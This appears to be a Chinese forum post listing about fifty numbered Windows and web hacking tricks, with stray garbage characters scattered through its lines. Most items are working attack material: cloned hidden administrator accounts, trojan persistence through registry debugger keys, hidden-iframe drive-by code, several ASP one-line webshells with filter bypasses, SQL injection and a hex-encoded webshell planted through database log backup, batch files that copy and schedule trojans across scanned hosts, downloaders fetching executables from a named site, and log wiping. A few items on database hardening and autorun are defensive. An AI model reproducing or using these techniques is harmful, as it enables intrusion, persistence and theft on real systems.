Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
3 {" x8 C: b5 F7 f9 Gcacls C:\windows\system32 /G hqw20:R
$ o8 N0 C6 q+ ^. X B0 ^5 I& d思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
4 [2 J7 W1 U! ^. t1 H" o s恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
0 W9 f$ p/ G* a* T. K
' Y) F, T( G; Q! `! T6 Q: ]) J0 T2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。2 h* r3 V, b6 Y
/ f1 H9 Y7 N' _. u5 G& ?: G
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
* s, B4 F# N9 q- m$ s" p
/ u+ ~& g3 G/ Y5 e+ w9 w4 f4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号" g6 S9 O- Q9 l. Q
8 B L% T% [7 W! `
5、利用INF文件来修改注册表3 |9 N6 @6 r: M" E K$ H8 F& ]8 P
[Version]; H1 l. E F1 M" q
Signature="$CHICAGO$"
# x' F* b7 C/ p5 N3 N5 J, V[Defaultinstall]. a& r: X% r. {: y& M+ j* g# D
addREG=Ating
" Z, s9 O2 g3 }[Ating]0 c" N1 {3 @5 v0 z" g+ d* e
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"7 I8 a: N6 N- }$ Y
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
( F( Q3 C% h! U1 Z8 [rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
4 P% o7 E% _8 p$ x! O6 `3 q其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU/ V7 G' o6 [2 V c: u: m3 [
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
& |; q4 j) b& D1 @' p3 L( w# qHKEY_CURRENT_CONFIG 简写为 HKCC, p* Y [/ s, z' {
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值; @5 X' m# g( r8 Z
"1"这里代表是写入或删除注册表键值中的具体数据, K* f4 v- j# r9 P5 F0 b
( o! ~: h9 h0 D0 y Y3 N, f1 M6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
- a$ Z. |. ]; w6 y( K( x3 i多了一步就是在防火墙里添加个端口,然后导出其键值
& U. b* P+ t& I5 l) A[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]# a* ]0 i8 R1 G
. i; e+ T* p7 v2 R" t5 e( R2 c; @
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
5 i- L. ?7 M$ [0 {0 q# c- `在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
- ?/ m. [. z2 V/ I m: o6 E
! E" C4 t: l8 u8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。1 `, y2 i) y8 o. m% ?3 l
8 U+ `# O; p) E' |% l
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
0 R5 G/ Q$ f$ R5 S E; b1 X) \可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。3 Y( ]# u1 b0 Z2 V% C
& ^9 @6 h9 e% I4 \10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
5 T% b4 z* m- [& K. P4 z9 x8 r4 S9 G2 g$ L
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
$ F" N+ B% m3 N+ d用法:xsniff –pass –hide –log pass.txt
0 z" o3 z9 m: `7 y2 M
1 K9 {% i7 y, w! r5 |12、google搜索的艺术) L! m: c j- V! j2 b+ T& Y
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
* L- X0 D% ]; y1 G4 z( c! h或“字符串的语法错误”可以找到很多sql注入漏洞。
$ x& v4 F& a* W" A3 @8 I$ Z' ~ W4 U/ j) N2 ?; t
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
( h Y5 F' h# b6 i, \ L
& t+ J9 F9 E; u/ J; u14、cmd中输入 nc –vv –l –p 1987
, n2 Y8 w% d! C7 Y, j/ }) u做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃; r! ]+ Q% h8 ]6 c8 D
1 E3 e* ]" s3 p2 t; w15、制作T++木马,先写个ating.hta文件,内容为
5 [% Z3 Y" c, s- L# M4 u' w: {<script language="VBScript">
" F1 ^1 |& _9 a" v. ^! s) dset wshshell=createobject ("wscript.shell" )# t: M, n8 z1 s. B& Z7 s4 z) b
a=wshshell.run("你马的名称",1)
% w! j, z* d; [0 b6 ?" {3 u# s( ]8 r8 O# ywindow.close
% Q% I% Q% g6 b9 o</script>" L' p- c* F5 R
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
+ O- R0 r/ f$ d; e9 V7 F1 U- x# B/ y) W* D1 x4 b2 ^
16、搜索栏里输入
) [, w9 Z$ B6 _2 o关键字%'and 1=1 and '%'='4 s- Q$ [- {: @" H) _8 e
关键字%'and 1=2 and '%'='
( A# E0 Z2 ?* V' c比较不同处 可以作为注入的特征字符
+ z4 `# k3 ~) r8 W" ~8 s, D/ f- B% h2 v8 o7 g- ^
17、挂马代码<html>* ?3 V' l ]& x2 I
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>% U! z- G; M5 {$ s
</html>
, r- o" x" p# l; o- T7 r1 f- k' }+ f8 D- s& q1 F
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,0 f6 r/ I* m" u, X8 I2 y+ S7 W
net localgroup administrators还是可以看出Guest是管理员来。 E. F5 D& |) o/ X( n- y5 O, F
7 L+ \/ Q+ F' [5 K19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等/ |: i' Q7 w4 L$ Y, i2 U# x0 k
用法: 安装: instsrv.exe 服务名称 路径
! K% K- P9 X' W3 B卸载: instsrv.exe 服务名称 REMOVE
: z( H+ L( S6 r8 i; J; k
/ A5 A( o3 e: h6 U' W5 c+ ]3 h" Z c {3 Q% c5 K5 r* _
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
4 @6 x7 p1 x% j4 O不能注入时要第一时间想到%5c暴库。
' W/ }1 S5 |2 A$ U2 T) x3 |
$ I3 `; W* P+ V22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~; h! V; B9 U& Z) N, v) i7 }) y
" B- j/ ]* r1 E/ ^23、缺少xp_cmdshell时
0 p7 o+ {, d, m4 l# m尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
/ F; Q& W# j0 D K9 f假如恢复不成功,可以尝试直接加用户(针对开3389的)
: c B$ H1 o1 U- Kdeclare @o int2 T8 I" j0 i7 F9 g* V7 |% @
exec sp_oacreate 'wscript.shell',@o out
; V& z1 J3 Z Y/ P* N6 m5 Nexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员: Q+ k! X6 _& R0 k% s
- M$ S$ i1 [* \) k" ?( F
24.批量种植木马.bat
. `9 ], u* }6 v# E1 g+ t8 d3 Gfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中; M' x! m3 a/ |6 G, W. h' c8 I
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间+ B1 F# b& g4 ?- N
扫描地址.txt里每个主机名一行 用\\开头% ]* p; J* @* G4 i# i2 w
8 d4 Q3 Q ~# {+ _$ y9 J; N
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。) n0 m. }, b! x+ T0 P
6 e, e6 [# t: P% d9 y, @, H
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
0 ]& X" y- d# b1 _1 C$ m将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
1 j6 c" S# J' o; g# @! {* s.cer 等后缀的文件夹下都可以运行任何后缀的asp木马$ O$ j! t4 I; n; O
' q- K) u- [7 l& Q; j' J
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
; P5 f4 j) b( C7 n% S然后用#clear logg和#clear line vty *删除日志
5 J8 z( S* W) x4 n$ N' U7 ^ M O. B/ g) Z! [
28、电脑坏了省去重新安装系统的方法
$ n( W- s; W8 X$ r/ C: @ J: Y纯dos下执行,2 \/ y( n5 @# r Y- \
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config5 z- E2 a: i4 L' `
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config Q" W% A* I5 _
" }$ C$ a) {9 C+ Y$ h& z' C
29、解决TCP/IP筛选 在注册表里有三处,分别是:6 o# f. U0 x+ G5 ]+ K U3 M. ^
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip% V/ i6 x a0 |$ O
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip8 v& @6 O% i5 m
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip. N2 E) v" r) o' ]% z
分别用
+ X. }' @9 s. dregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
6 k" ]/ J9 R0 Y6 Q, r/ }* h. yregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip+ K/ s& k3 F0 w% c
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip. B3 M& [0 a* }- J
命令来导出注册表项* R8 s U5 B* m D4 v
然后把三个文件里的EnableSecurityFilters"=dword:00000001,2 H# y* G# e7 m5 r* ~) ?( I
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
0 O% J5 Z7 L, J, gregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。# U/ C% Q( R- J! w! i
9 ]; _2 _1 }2 y% s+ } e& _30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U! T% V+ O# F {9 d8 f) a& \3 C' \, z) U
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3. [7 m5 l& J" g0 q
4 ^9 m; j, z' | P
31、全手工打造开3389工具
( V6 x/ Q6 W+ a5 k# ?, c打开记事本,编辑内容如下:! U" y. l8 d' q' H. {
echo [Components] > c:\sql
- G4 I8 _& }$ E, d( W6 Necho TSEnable = on >> c:\sql
, E: ^1 y2 }1 I8 wsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
& J" b$ k6 q6 F! ^编辑好后存为BAT文件,上传至肉鸡,执行. m) a; |8 ~7 ?( E9 P. n
4 n6 m' C. F1 i) Q- a32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
8 i" a" S, V' y$ o- |: h' M6 Y5 H$ Q3 u( M( |* R, a
33、让服务器重启
3 h% p* ^; l' a* B+ N写个bat死循环:* A$ `2 q6 A+ i6 @
@echo off
! C: Y7 E7 }( r/ V) B) c# U:loop1& X$ u5 W0 i! ^4 m* u) q
cls7 D" m" f: V9 _( D/ b: C
start cmd.exe
7 @4 p( b- D8 Q$ k: e7 R! k2 O+ ^goto loop13 e$ @& v+ b9 Z# y
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启- S5 z# t5 }. z T& @! C
! x% V0 e3 m: s
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,% H; `$ V* ]* l: K( A
@echo off
; c' o* w* e' s* \3 P/ adate /t >c:/3389.txt8 \) H+ F+ n% r0 Q
time /t >>c:/3389.txt+ Y1 f( V4 s4 y5 w3 W/ I" j T
attrib +s +h c:/3389.bat. t- I% Y/ d" V p! s5 g; @/ z
attrib +s +h c:/3389.txt: T, M% e1 ~$ W# U! m$ @5 R/ N Q; |
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt1 y: l& ]+ m( e/ w3 i- s
并保存为3389.bat6 o& \! l! H4 w: w1 x4 {$ S
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号, y. s' j' E" D8 S& E5 b( K
4 L9 L, t* c' v( w2 g$ R+ f# L1 t3 G/ x
35、有时候提不了权限的话,试试这个命令,在命令行里输入:; Z, r2 i2 C( R5 K7 B
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
- T. N0 t0 _7 D* P: X输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
8 w, P `) o) q0 I0 e) ]& e' c$ P. L3 E4 \" s ^! l* ]: P! c
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
, i# N, \3 w, U) c, g$ fecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
( \7 A6 X. k3 d( Uecho 你的FTP账号 >>c:\1.bat //输入账号
/ g( T$ Y, j- y$ y9 decho 你的FTP密码 >>c:\1.bat //输入密码$ a) y V4 Z+ w* P- E# V8 W, G; U
echo bin >>c:\1.bat //登入
4 |* ? x: @/ L% v1 W; uecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么9 T& n6 k% F( }8 S7 p& i
echo bye >>c:\1.bat //退出1 U& Y9 }' ~; G8 M9 l# I
然后执行ftp -s:c:\1.bat即可
; r. H) q% l5 E, f$ A
8 y8 j2 x% s; m" @: G37、修改注册表开3389两法. O; b. @, p; C5 Q9 O/ x
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表- s" y6 u7 P' a) O" h
echo Windows Registry Editor Version 5.00 >>3389.reg
! W( e' K; ]/ ^( [8 i* yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
0 s! w) P7 C( i% h$ I( B$ @6 Cecho "Enabled"="0" >>3389.reg- H+ s2 g; {2 P6 s5 O# R- Y9 u5 ?
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows/ ^. z4 o, [! b, Y) [$ ?
NT\CurrentVersion\Winlogon] >>3389.reg
0 m5 Z5 d( O# U% l5 A7 oecho "ShutdownWithoutLogon"="0" >>3389.reg$ C8 F3 e" N) ^" R
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]2 }8 r: H/ x6 |( F
>>3389.reg
! t/ E+ Z$ ]2 E* b3 lecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
% Z8 c1 V/ U, Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]3 O- Z M9 D- d3 L
>>3389.reg
! A( ~0 x7 f) e0 cecho "TSEnabled"=dword:00000001 >>3389.reg
6 V1 m0 M0 Q8 L2 ` ^" mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg- X9 n6 K3 p$ [0 `2 B" K% s) `
echo "Start"=dword:00000002 >>3389.reg- j+ Q7 u3 |8 Y& m, V2 b+ D' Q1 i8 [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]& i) ?: R8 @- p, G/ e
>>3389.reg1 w5 v- [- }3 }4 I' N
echo "Start"=dword:00000002 >>3389.reg
8 E# F- t! ^/ _8 @: Y7 mecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
! H" ]! Z+ D6 ~; _! e+ `4 ~3 x9 {echo "Hotkey"="1" >>3389.reg0 n4 U0 Z5 C5 Y! y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% f8 D3 n: \% M. [" ^7 l, @! C7 n- _
Server\Wds\rdpwd\Tds\tcp] >>3389.reg/ y- B- H' O% x2 o
echo "PortNumber"=dword:00000D3D >>3389.reg
. x m. G U0 h- d, uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 L7 N' j5 f. e7 n( Y5 l! XServer\WinStations\RDP-Tcp] >>3389.reg9 R8 L- \9 s) D
echo "PortNumber"=dword:00000D3D >>3389.reg
, y5 \5 ~& z( ~& [# \把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。6 G; A" d9 h4 o. E3 i, u8 w
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
4 P- c& i D+ V, g' S1 O& M7 L因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效# Z& l' ? c4 i
(2)winxp和win2003终端开启
! T( ^& v1 |- M" O! o- X. y: p: t; [用以下ECHO代码写一个REG文件:% ^) E9 z4 c% a# c# ?& Q/ c
echo Windows Registry Editor Version 5.00>>3389.reg, m H2 S. e3 z% S! U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- _. x" r7 t: o1 bServer]>>3389.reg
% c- M9 r5 T# Y( Fecho "fDenyTSConnections"=dword:00000000>>3389.reg
. @( y$ W+ @1 Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, \$ X! |% P5 ?5 _( y! s2 ^/ t5 sServer\Wds\rdpwd\Tds\tcp]>>3389.reg) i7 l. j1 P+ G
echo "PortNumber"=dword:00000d3d>>3389.reg3 r( A- D' j4 s6 O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ Y9 d! F1 k2 t UServer\WinStations\RDP-Tcp]>>3389.reg
7 E/ i& ?4 G6 Y8 t4 Pecho "PortNumber"=dword:00000d3d>>3389.reg. H) l0 O0 R& B$ {
然后regedit /s 3389.reg del 3389.reg( @/ H6 K8 A& B {
XP下不论开终端还是改终端端口都不需重启- |8 F! Y( d" T6 v* c$ M
$ H) K. i9 s" n/ Y( @38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
1 r) S6 i. ?9 {9 [ R用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'; D0 @( A' W( ?; [4 B4 T
5 i/ o7 o7 [' c$ U/ m, T3 A3 j39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!- b: ^& N5 L( |; Z: n
(1)数据库文件名应复杂并要有特殊字符6 S" F4 m* _" e! l$ I
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
* V. |; {& C0 T将conn.asp文档中的
) M7 ]$ S! {9 s' |DBPath = Server.MapPath("数据库.mdb")' N2 R$ Q2 I/ k
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
8 Q* W$ d/ q* a- r6 C# R! S8 {8 j+ P6 D# ~( M
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置9 o) z; b# i0 j; K
(3)不放在WEB目录里9 V2 o* C3 M R# G
, [5 z! v4 e. w. Z) ^
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
# ~2 C1 b4 l3 `+ O! _可以写两个bat文件0 F! F0 q J, s5 @3 \/ J7 F1 q, R
@echo off
. D& j* M: d/ ~+ Q@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe; W) A8 P9 g$ B
@del c:\winnt\system32\query.exe
$ K9 h4 X S I; Y$ T3 y# W) j@del %SYSTEMROOT%\system32\dllcache\query.exe* r& M5 f9 R, t; R" S
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
: Q- z* s3 O5 U+ I) C
" ?$ p- ]2 I4 e) s& M9 [- x@echo off) d0 a A2 h: m$ d4 x; V, m6 x
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
+ w! D' ?. {% K3 G, x@del c:\winnt\system32\tsadmin.exe
" z1 l& s$ ?8 o7 C/ [- S@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex& R: U" m( k2 F5 S+ n+ u
& N# v' _! L* S: M
41、映射对方盘符9 b/ w |8 k* a; n
telnet到他的机器上,$ W! f; C, _) h; Q; [
net share 查看有没有默认共享 如果没有,那么就接着运行
9 w, C) _( Q. Vnet share c$=c:/ D7 l0 a/ F' ?$ D' s* C& ^
net share现在有c$
' \3 m- X5 _* S在自己的机器上运行$ E% B% ?9 a( f6 J1 h6 o( U- y
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K k* o* e+ Z+ L0 T; h
" P1 C+ v- V: `. Y0 f4 |3 ^
42、一些很有用的老知识
% l9 T+ h4 q0 Q H" D) a/ N9 r0 }' otype c:\boot.ini ( 查看系统版本 )
- P% R4 _% V+ J: H: Bnet start (查看已经启动的服务)% ~/ r \! {! k8 U9 p o; D
query user ( 查看当前终端连接 )& _7 W4 z8 } f( O4 u; }
net user ( 查看当前用户 )
, s- ?9 B K7 \4 L! ]: Unet user 用户 密码/add ( 建立账号 )+ V5 p4 {. T. ]1 Q0 Z6 {+ n' }$ ~
net localgroup administrators 用户 /add (提升某用户为管理员)
2 \" b! u9 p7 A! R% O/ k! G0 Mipconfig -all ( 查看IP什么的 )# P$ S) R6 a4 i/ Z" `5 h" u
netstat -an ( 查看当前网络状态 )2 f- K, J! ?8 P) j
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
: }/ j# b7 {- j& r* U1 G1 w克隆时Administrator对应1F4' B, q- G+ R8 P0 M; B# k" Y! o
guest对应1F5
, @' [5 ~/ k# D7 Dtsinternetuser对应3E8: y8 K7 _6 I# ]' o3 ~( j* k
5 K; E6 f( O8 x43、如果对方没开3389,但是装了Remote Administrator Service
* D$ B0 w0 ?0 T, J7 [) u" F用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接7 l ?1 a9 U, v i
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
& I" H! S* z2 o" W先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin". v" y, l. _/ o ^! n" r
+ E- I* Q8 N0 Z
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)& R- a6 q `7 X2 J! V% U
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
( W$ N! o" F' ~" U( O F
# d0 h5 z$ g6 T( m7 @1 o45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)5 F5 J4 S, Q7 g4 L: d
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
/ E# C% h) Y# k2 ^2 {. |^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =1 H5 X+ m/ p; c! F% }
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
+ C" i- B6 `# z4 L" o) R4 }' ?1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
" B8 q. ]$ o2 p, k4 o/ R6 D(这是完整的一句话,其中没有换行符)
* f9 `& S9 ]. N2 c/ G" G7 V% ~然后下载:! Z8 W4 R- P1 `! w8 H0 y
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
% K7 _. ~4 o- ~. U s R& Z/ b. P+ ]
3 o4 J Y% ^; R- Z& g, H: x3 W46、一句话木马成功依赖于两个条件: n# M: t# G& h# m7 q" z. D
1、服务端没有禁止adodb.Stream或FSO组件. O% ^. r& W0 W6 \/ M6 I
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。/ ^4 {! T& U- p5 m- Z
! R6 n5 E4 W% L4 C" _+ W f
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
$ p, F j& P D- p+ ^;alter database utsz set RECOVERY FULL--" d& ]: X2 S. g/ Q5 v% q. `. [
;create table cmd (a image)--3 M8 [( [) M. o) z" }
;backup log utsz to disk = 'D:\cmd' with init--' F/ U9 | {- ~0 F: T
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
. Z0 b5 `, X6 H; e- C;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--' P, w# ~ m# k- F2 \4 _
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
: F, |! G7 `! R- U
, ^& V# s" o6 S48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
5 L0 O4 S( }. |$ i2 i& o& K
* a4 G. ^: l( G: g9 b: y用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options: `2 o& T/ _7 |
所有会话用 'all'。, l: q2 l& H& p* B8 d- D a7 y$ r
-s sessionid 列出会话的信息。
: c4 _, k$ Q+ n$ x-k sessionid 终止会话。+ i- ~$ A' s. K* o, `; n5 Q9 Z, p
-m sessionid 发送消息到会话。- N: |; i# z9 y" E" c5 V
! t2 b/ M8 D: d' c& \config 配置 telnet 服务器参数。: ?- r- k2 |9 s u5 u$ P
% r! R: l% u% j' |+ `) `1 j+ Z' Ccommon_options 为:; h: G. D6 X6 K, j
-u user 指定要使用其凭据的用户0 x1 [! i c9 z7 y; B, K7 h
-p password 用户密码: J% ^/ f$ H4 Y
( s9 k, f& r6 [) d z% b* ~
config_options 为:3 e# z4 v) Y+ c6 d. k
dom = domain 设定用户的默认域
9 L0 |- t; E; t0 B& rctrlakeymap = yes|no 设定 ALT 键的映射 d6 L4 t% j4 J7 j
timeout = hh:mm:ss 设定空闲会话超时值
% ]: _/ w: o1 v0 ttimeoutactive = yes|no 启用空闲会话。; Y9 z% ~: z/ w6 t T' Y4 T6 {
maxfail = attempts 设定断开前失败的登录企图数。
4 e) t$ v2 [* L/ o; cmaxconn = connections 设定最大连接数。 Y& {9 e B3 T% V4 f3 k$ D
port = number 设定 telnet 端口。
7 V( D, f/ y4 E7 d A& B0 [" k- \4 k9 Usec = [+/-]NTLM [+/-]passwd
9 W+ w- m! T, R3 p4 }9 z设定身份验证机构( b$ C% Z( w- H: t
fname = file 指定审计文件名。. A& B' T( h8 e% F$ m9 n" i
fsize = size 指定审计文件的最大尺寸(MB)。
2 A( L8 h* X( wmode = console|stream 指定操作模式。
; t5 s2 b7 p8 t4 [! \" X/ Iauditlocation = eventlog|file|both
2 G4 U! r( x0 I4 }( a5 w2 Z t指定记录地点
. V4 ?1 L' Z: T- daudit = [+/-]user [+/-]fail [+/-]admin
8 v) |( V4 }) y \/ K" k% R, H' c" O# w. |& W
49、例如:在IE上访问:
& \; S& `# y0 w/ h1 \0 dwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/! j% r% G7 j4 @8 Z4 B; t4 t6 t
hack.txt里面的代码是:) H V1 o9 t$ I0 L7 c' m' c1 q
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/"> c, |2 q2 `, @
把这个hack.txt发到你空间就可以了!
: [: q4 |: F3 i4 I这个可以利用来做网马哦!9 c7 X: h! ]; n( V* G* e
8 j. _2 K; `. x9 |1 q
50、autorun的病毒可以通过手动限制!
5 s$ Z/ w9 @7 }$ U1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!# ?4 g! U Q' l p! v! _7 f6 [$ d
2,打开盘符用右键打开!切忌双击盘符~/ Z k2 V: f. M1 _
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!6 K8 v( K5 ?3 g5 [: n) G* a5 j7 U
+ I" A3 |8 u5 x4 ^
51、log备份时的一句话木马:
, j" o- G4 \' {- q) f! f: Z5 z1 l% f Ba).<%%25Execute(request("go"))%%25>. U# o( U* l p' |8 s+ u
b).<%Execute(request("go"))%>% G6 F7 x; Y( ^8 K3 q
c).%><%execute request("go")%><%
% P7 p6 j; Q: A0 k% ^+ g* qd).<script language=VBScript runat=server>execute request("sb")</Script>: Q1 o" n' Q3 o0 C; \+ @
e).<%25Execute(request("l"))%25>" O- e8 V1 L, \8 @# `* L+ @
f).<%if request("cmd")<>"" then execute request("pass")%>
' Q6 E% q2 P; ^) N/ | M) J0 q) P/ {% I J/ U- Z4 Y
52、at "12:17" /interactive cmd
% C& v8 b1 d6 W. Q& x) ]执行后可以用AT命令查看新加的任务
